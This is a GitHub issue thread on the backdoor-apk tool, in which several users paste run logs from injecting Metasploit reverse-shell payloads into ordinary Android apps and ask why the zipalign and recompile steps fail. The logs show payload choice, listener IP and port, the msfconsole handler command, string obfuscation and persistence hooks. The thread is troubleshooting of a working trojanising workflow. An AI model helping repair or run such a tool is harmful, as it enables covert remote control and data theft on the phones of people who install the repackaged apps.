### ISSUE TITLE
[!] Failed to align recompiled APK

### ISSUE THREAD

**Issue by defcony** [dana-at-cp/backdoor-apk#81]
I have tried this with random apks..but still somehow it always fails in Aligning the apk..please help
 @dana-at-cp

i have already installed ia32-libs on my linux,

[*] Running backdoor-apk.sh v0.1.9 on Fri Feb 17 03:39:23 IST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.102
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK

**Comment by dana-at-cp** [comment]
@defcony Hello. Can you go to the directory where zipalign resides and execute the binary? Share the output as a comment here. I think i know what is afoot.

```
root@kali:~/Code/github/backdoor-apk/backdoor-apk/third-party/android-sdk-linux/build-tools/23.0.3# ./zipalign
<your system output goes here>
...
```

**Comment by rielinux** [comment]
Hi... @dana-at-cp  it's me again, i've got another problem over here.

But here come another problem:
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.7
[?] Please enter an LPORT value: 3333
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

I tried to compiled and recompiled a "dictionary.apk" that i've been took it from G-play store and it Failed to recompile.

**Comment by abir1937** [comment]
[*] Running backdoor-apk.sh v0.2.2 on Thu Aug  3 17:49:43 +06 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.104
[?] Please enter an LPORT value: 4444
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

**Comment by rocky2496** [comment]
meterpreter/reverse_http 4) shell/reverse_http
meterpreter/reverse_https 5) shell/reverse_https
meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.102
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Generating RAT APK file...done.
[] Decompiling RAT APK file...done.
[] Decompiling original APK file...done.
[] Merging permissions of original and payload projects...done.
[] Running proguard on RAT APK file...done.
[] Decompiling obfuscated RAT APK file...done.
[] Creating new directories in original project for RAT smali files...done.
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Locating smali file to hook in original project...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[] Recompiling original project with backdoor...done.
[] Generating RSA key for signing...done.
[] Signing recompiled APK...done.
[] Verifying signed artifacts...done.
[] Aligning recompiled APK...done.
[!] Failed to align recompiled APK





please solve my problem

**Comment by FirstClickin** [comment]
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error
